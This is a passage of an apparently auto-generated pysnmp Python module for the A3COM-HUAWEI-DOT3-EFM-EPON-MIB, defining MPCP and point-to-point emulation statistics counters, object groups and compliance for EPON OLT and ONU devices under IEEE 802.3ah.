if mibBuilder.loadTexts: h3cDot3MpcpSyncTime.setDescription('A read-only value that reports the -sync lock time- for an OLT receiver in increments of Time Quanta (TQ) 16ns as defined in [802.3ah] 60,64,65. The value returned shall be (sync lock time ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpStatTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2), )
if mibBuilder.loadTexts: h3cDot3MpcpStatTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpStatTable.setDescription('This table defines the list of statistics counters of [802.3ah] clause 64 MPCP interface.')
h3cDot3MpcpStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3MpcpStatEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpStatEntry.setDescription('Table entries for table of statistics counters of [802.3ah] clause 64 MPCP interface.')
h3cDot3MpcpMACCtrlFramesTransmitted = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 1), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesTransmitted.setReference('[802.3ah], 30.3.5.1.7.')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesTransmitted.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesTransmitted.setDescription('A count of MPCP frames passed to the MAC sublayer for transmission. This counter is incremented when a MA_CONTROL.request service primitive is generated within the MAC control sublayer with an opcode indicating a MPCP frame. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpMACCtrlFramesReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 2), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesReceived.setReference('[802.3ah], 30.3.5.1.8.')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesReceived.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesReceived.setDescription('A count of MPCP frames passed by the MAC sublayer to the MAC Control sublayer. This counter is incremented when a ReceiveFrame function call returns a valid frame with: (1) a lengthOrType field value equal to the reserved Type for 802.3_MAC_Control as specified in 31.4.1.3, and (2) an opcode indicating a MPCP frame. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpDiscoveryWindowsSent = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryWindowsSent.setReference('[802.3ah], 30.3.5.1.22.')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryWindowsSent.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryWindowsSent.setDescription('A count of discovery windows generated. The counter is incremented by one for each generated discovery window. This attribute is relevant for an OLT and an ONU. At the ONU value should be zero.')
h3cDot3MpcpDiscoveryTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryTimeout.setReference('[802.3ah], 30.3.5.1.23.')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryTimeout.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryTimeout.setDescription('A count of the number of times a discovery timeout occurs. Increment the counter by one for each discovery processing state-machine reset resulting from timeout waiting for message arrival. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpTxRegRequest = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 5), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxRegRequest.setReference('[802.3ah], 30.3.5.1.12.')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegRequest.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegRequest.setDescription('A count of the number of times a REGISTER_REQ MPCP frames transmission occurs. Increment the counter by one for each REGISTER_REQ MPCP frame transmitted as defined in [802.3ah] clause 64. This counter is mandatory for an ONU. This attribute is relevant for an OLT and an ONU. At the OLT value should be zero.')
h3cDot3MpcpRxRegRequest = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 6), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxRegRequest.setReference('[802.3ah], 30.3.5.1.17.')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegRequest.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegRequest.setDescription('A count of the number of times a REGISTER_REQ MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER_REQ MPCP frame received for each LLID as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the ONU value should be zero.')
h3cDot3MpcpTxRegAck = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 7), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxRegAck.setReference('[802.3ah], 30.3.5.1.10.')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegAck.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegAck.setDescription('A count of the number of times a REGISTER_ACK MPCP frames transmission occurs. Increment the counter by one for each REGISTER_ACK MPCP frame transmitted as defined in [802.3ah] clause 64. This counter is mandatory for an ONU. This attribute is relevant for an OLT and an ONU. At the OLT the value should be zero.')
h3cDot3MpcpRxRegAck = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 8), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxRegAck.setReference('[802.3ah], 30.3.5.1.15.')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegAck.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegAck.setDescription('A count of the number of times a REGISTER_ACK MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER_ACK MPCP frame received for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the ONU the value should be zero.')
h3cDot3MpcpTxReport = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 9), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxReport.setReference('[802.3ah], 30.3.5.1.13.')
if mibBuilder.loadTexts: h3cDot3MpcpTxReport.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxReport.setDescription('A count of the number of times a REPORT MPCP frames transmission occurs. Increment the counter by one for each REPORT MPCP frame transmitted as defined in [802.3ah] clause 64. This counter is mandatory for an ONU. This attribute is relevant for an OLT and an ONU. At the OLT value should be zero.')
h3cDot3MpcpRxReport = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 10), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxReport.setReference('[802.3ah], 30.3.5.1.18.')
if mibBuilder.loadTexts: h3cDot3MpcpRxReport.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxReport.setDescription('A count of the number of times a REPORT MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REPORT MPCP frame received for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the ONU value should be zero.')
h3cDot3MpcpTxGate = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 11), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxGate.setReference('[802.3ah], 30.3.5.1.9.')
if mibBuilder.loadTexts: h3cDot3MpcpTxGate.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxGate.setDescription('A count of the number of times a GATE MPCP frames transmission occurs. A set of counters, one for each LLID, at the OLT. Increment the counter by one for each GATE MPCP frame transmitted, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an OLT. This attribute is relevant for an OLT and an ONU. At the ONU the value should be zero.')
h3cDot3MpcpRxGate = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 12), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxGate.setReference('[802.3ah], 30.3.5.1.14.')
if mibBuilder.loadTexts: h3cDot3MpcpRxGate.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxGate.setDescription('A count of the number of times a GATE MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID ,at the OLT. Increment the counter by one for each GATE MPCP frame received, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the OLT the value should be zero.')
h3cDot3MpcpTxRegister = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 13), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxRegister.setReference('[802.3ah], 30.3.5.1.11.')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegister.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegister.setDescription('A count of the number of times a REGISTER MPCP frames transmission occurs. A set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER MPCP frame transmitted, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an OLT. This attribute is relevant for an OLT and an ONU. At the ONU the value should be zero.')
h3cDot3MpcpRxRegister = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 14), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxRegister.setReference('[802.3ah], 30.3.5.1.16.')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegister.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegister.setDescription('A count of the number of times a REGISTER MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER MPCP frame received, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. at the OLT the value should be zero.')
h3cDot3MpcpRxNotSupportedMPCP = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 15), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxNotSupportedMPCP.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxNotSupportedMPCP.setDescription('A count of the number of times a non-supported MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each non-supported MPCP frame received, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT.')
h3cDot3MpcpGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1))
h3cDot3MpcpGroupBase = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpOperStatus"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMode"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpLinkID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRemoteMACAddress"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRegistrationState"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMaximumPendingGrants"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpAdminState"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3MpcpGroupBase = h3cDot3MpcpGroupBase.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpGroupBase.setDescription('A collection of objects of dot3 Mpcp Basic entity state definition.')
h3cDot3MpcpGroupParam = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1, 2)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTransmitElapsed"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpReceiveElapsed"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRoundTripTime"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpOnTime"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpOffTime"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpSyncTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3MpcpGroupParam = h3cDot3MpcpGroupParam.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpGroupParam.setDescription('A collection of objects of dot3 Mpcp for P2MP parameters.')
h3cDot3MpcpGroupStat = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1, 3)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMACCtrlFramesTransmitted"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMACCtrlFramesReceived"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpDiscoveryWindowsSent"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpDiscoveryTimeout"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxRegRequest"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxRegRequest"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxRegAck"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxRegAck"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxReport"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxReport"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxGate"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxGate"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxRegister"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxRegister"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxNotSupportedMPCP"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3MpcpGroupStat = h3cDot3MpcpGroupStat.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpGroupStat.setDescription('A collection of objects of dot3 Mpcp Statistics')
h3cDot3MpcpCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 2))
h3cDot3MpcpCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 2, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpGroupBase"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpGroupParam"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpGroupStat"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3MpcpCompliance = h3cDot3MpcpCompliance.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpCompliance.setDescription('The compliance statement for Multi-point control protocol interfaces.')
h3cDot3OmpEmulationMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2))
h3cDot3OmpEmulationObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1))
h3cDot3OmpeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2))
h3cDot3OmpEmulationTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1), )
if mibBuilder.loadTexts: h3cDot3OmpEmulationTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationTable.setDescription('Table for dot3 OmpEmulation MIB modules.')
h3cDot3OmpEmulationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3OmpEmulationEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationEntry.setDescription('An entry in the dot3 OmpEmulation MIB modules table.')
h3cDot3OmpEmulationID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationID.setReference('[802.3ah], 30.3.7.1.1.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationID.setDescription('The value of h3cDot3OmpEmulationID is assigned so as to uniquely identify a OMPEmulation entity among the subordinate managed objects of the containing object. The value is mandated for an ONU.')
h3cDot3OmpEmulationType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("olt", 2), ("onu", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationType.setReference('[802.3ah], 30.3.7.1.2.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationType.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationType.setDescription('A read-only value that indicates that mode of operation of the Reconciliation Sublayer for Point to Point Emulation (see [802.3ah] clause 65.1). unknown(1) value is assigned in initializing, true state or type not yet known. olt(2) value is assigned when Sublayer operating in OLT mode. onu(3) value is assigned when Sublayer operating in ONU mode.')
h3cDot3OmpEmulationStatTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2), )
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatTable.setDescription('This table defines the list of statistics counters of [802.3ah] clause 65 OMP interface.')
h3cDot3OmpEmulationStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatEntry.setDescription('Table entries for Table of statistics counters of [802.3ah] clause 65 OMP interface.')
h3cDot3OmpEmulationSLDErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 1), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationSLDErrors.setReference('[802.3ah], 30.3.7.1.3.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationSLDErrors.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationSLDErrors.setDescription('A count of frames received that do not contain a valid SLD field as defined in [802.3ah] clause 65.1.3.3.1. This attribute is mandatory for an OLT and optional for an ONU.')
h3cDot3OmpEmulationCRC8Errors = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 2), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationCRC8Errors.setReference('[802.3ah], 30.3.7.1.4.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationCRC8Errors.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationCRC8Errors.setDescription('A count of frames received that contain a valid SLD field, as defined in [802.3ah] clause 65.1.3.3.1, but do not pass the CRC-8 check as defined in [802.3ah] clause 65.1.3.3.3. This attribute is mandatory for an OLT and for an ONU.')
h3cDot3OmpEmulationBadLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 3), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationBadLLID.setReference('[802.3ah], 30.3.7.1.8.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBadLLID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBadLLID.setDescription('A count of frames received that contain a valid SLD field, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, but are discarded due to the LLID check as defined in [802.3ah] clause 65.1.3.3.2. This attribute is relevant for an OLT and an ONU.')
h3cDot3OmpEmulationGoodLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 4), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationGoodLLID.setReference('[802.3ah], 30.3.7.1.5.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationGoodLLID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationGoodLLID.setDescription('A count of frames received that contain a valid SLD field, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3. This attribute is relevant for an OLT and an ONU.')
h3cDot3OmpEmulationOnuPonCastLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 5), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuPonCastLLID.setReference('[802.3ah], 30.3.7.1.6.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuPonCastLLID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuPonCastLLID.setDescription('A count of frames received that contain a valid SLD field in an ONU, as defined in [802.3ah] 65.1.3.3.1, passes the CRC-8 check, as defined in [802.3ah] 65.1.3.3.3, and the frame meets the rule for acceptance defined in [802.3ah] 65.1.3.3.2.')
h3cDot3OmpEmulationOltPonCastLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 6), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationOltPonCastLLID.setReference('[802.3ah], 30.3.7.1.7.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOltPonCastLLID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOltPonCastLLID.setDescription('A count of frames received that contain a valid SLD field in an OLT, as defined in [802.3ah] 65.1.3.3.1, passes the CRC-8 check, as defined in [802.3ah] 65.1.3.3.3, and the frame meets the rule for acceptance defined in [802.3ah] 65.1.3.3.2.')
h3cDot3OmpEmulationBroadcastLLIDNotOnuID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 7), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDNotOnuID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDNotOnuID.setDescription('A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and contain broadcast LLID as defined in [802.3ah] clause 65. This attribute is mandatory for an OLT and for an ONU.')
h3cDot3OmpEmulationOnuLLIDNotBroadcast = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 8), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuLLIDNotBroadcast.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuLLIDNotBroadcast.setDescription("A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and contain the ONU's LLID as defined in [802.3ah] clause 65. This attribute is mandatory for an ONU and mandatory for an OLT (a counter per LLID).")
h3cDot3OmpEmulationBroadcastLLIDPlusOnuId = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 9), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDPlusOnuId.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBroadcastLLIDPlusOnuId.setDescription("A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and contain the broadcast LLID plus ONU's LLID (frame reflected) as defined in [802.3ah] clause 65. This attribute is mandatory for an ONU and mandatory for an OLT (a counter per LLID).")
h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 10), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId.setDescription("A count of frames received that contain a valid SLD field in a OLT, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, and does not contain the ONU's LLID as defined in [802.3ah] clause 65. This attribute is mandatory for an ONU")
h3cDot3OmpeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 1))
h3cDot3OmpeGroupID = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 1, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationType"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3OmpeGroupID = h3cDot3OmpeGroupID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpeGroupID.setDescription('A collection of objects of dot3 OMP emulation ID entity state definition.')
h3cDot3OmpeGroupStat = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 1, 2)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationSLDErrors"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationCRC8Errors"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationBadLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationGoodLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationOnuPonCastLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationOltPonCastLLID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationBroadcastLLIDNotOnuID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationOnuLLIDNotBroadcast"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationBroadcastLLIDPlusOnuId"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3OmpeGroupStat = h3cDot3OmpeGroupStat.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpeGroupStat.setDescription('A collection of objects of dot3 OMP emulation Statistics')
